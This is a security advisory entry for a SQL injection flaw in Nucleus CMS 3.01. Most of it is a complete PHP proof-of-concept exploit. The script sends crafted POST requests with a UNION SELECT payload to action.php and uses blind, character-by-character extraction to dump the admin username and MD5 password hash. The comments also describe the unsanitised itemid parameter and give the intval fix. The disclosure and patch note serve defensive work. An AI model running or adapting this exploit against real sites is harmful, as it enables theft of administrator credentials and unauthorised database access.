NucleusCMS 3.01 SQL Injection Vulnerability

2004-07-27T00:00:00
ID SECURITYVULNS:DOC:6543
Type securityvulns
Reporter Securityvulns
Modified 2004-07-27T00:00:00

Description

!/usr/bin/php

<?

// Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept // By aCiDBiTS acidbits@hotmail.com 24-July-2004 // // Nucleus CMS (http://nucleuscms.org) is a weblog php+mysql application. // // This Proof of Concept dumps the username and MD5(password) of the admin user placed at first position // of members table. First of all checks if we can use "union select" or it isn't patched and then if first // member is admin. // // Usage (in my debian box): // php4 -q nuc_addc_poc.php URL

// Vulnerability description // // In action.php, function addcoment, there's no user input sanization for parameter itemid. In line 65: // $blogid = getBlogIDFromItemID($post['itemid']); // This allows to inject SQL to get data form the database. // // Solution // // Modify line 65 with: // $blogid = getBlogIDFromItemID(intval($post['itemid']));

echo "+-------------------------------------------------------------------+\n| Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept |\n| By aCiDBiTS
acidbits@hotmail.com 24-July-2004 |\n+-------------------------------------------------------------------+\n\n";

if($argc<2) die("Usage: ".$argv[0]." URL\n\n"); $host=$argv[1]; if(substr($host,strlen($host)-1,1)!='/') $host.='/';

echo "Checking if vulnerable and \"union select\" works ... "; if( test_cond("1") && !test_cond("0") ) echo "OK!\n"; else die( "It doesn't :-(\n\n" );

echo "Checking if first member of table is admin ... "; if( test_cond("1") ) echo "OK!\n"; else die( "It's not :-(\n\n" );

echo "\nGetting username: "; get_field("mname"); echo "\nGetting MD5(password): "; get_field("mpassword");

die("\n\nDone!\n\n");

function get_field( $field ) { $unval= " 0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; $idx=1; $min=0; $max=strlen($unval); while($min!=$max) { $mid=$min+(($max-$min)/2); if( test_cond("ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1))) ) { $idx++; echo substr($unval,$mid,1); $min=0; $max=strlen($unval); if( !test_cond("ord(substring($field,$idx,1))") ) return; } else { if( test_cond("ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1))) ) $max=$mid; else $min=$mid; } } die( "\n\nUnexpected error!\n\n"); }

function test_cond( $cond ) {

$res=send_post("action=addcomment&url=index.php%3Fitemid%3D1&itemid=1+and+0+union+select+1+from+nucleus_member+where+madmin+and+mnumber=1+and+".urlencode($cond)."&body=a&user=a&userid="); if( eregi( "nucleus_ban", $res ) ) return 0; else return 1; }

function send_post($data) { global $host; $ch=curl_init(); curl_setopt ($ch, CURLOPT_URL, $host."action.php" ); curl_setopt ($ch, CURLOPT_HEADER, 0); curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt ($ch, CURLOPT_POST, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, $data ); $data=curl_exec ($ch); curl_close ($ch);

    return $data;

}

?>